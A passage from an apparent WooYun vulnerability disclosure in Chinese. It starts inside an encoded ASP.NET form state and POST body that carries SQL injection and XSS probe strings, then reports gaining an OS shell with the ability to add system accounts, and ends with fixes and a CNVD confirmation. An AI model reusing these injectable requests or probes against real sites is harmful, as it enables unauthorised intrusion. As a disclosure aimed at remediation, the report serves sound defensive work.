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%2BiqUOw4ePTsjiw3MQCssLq9bl34KZduohf&__EVENTVALIDATION=%2FwEWBwLfyp7YCwKZ7YzdCgKln%2FPuCgLw1sCIAgLw1ryIAgLw1qiIAgLw1qSIAhrCSdthbMoKzbLHYS0AnfUFZtJla1Ki%2Bxo2p6MEl4H1&txtSearch=123&btnSearch=%E6%9F%A5++%E8%AF%A2



20150902011444.png


os-shell,可添加系统帐号

20150902011314.png


20150902012549.png

修复方案:

禁止目录遍历
设置页面访问控制
过滤参数

版权声明:转载请注明来源 qglfnt@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-07 08:22

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。按多个风险评分,rank 12

最新状态:

暂无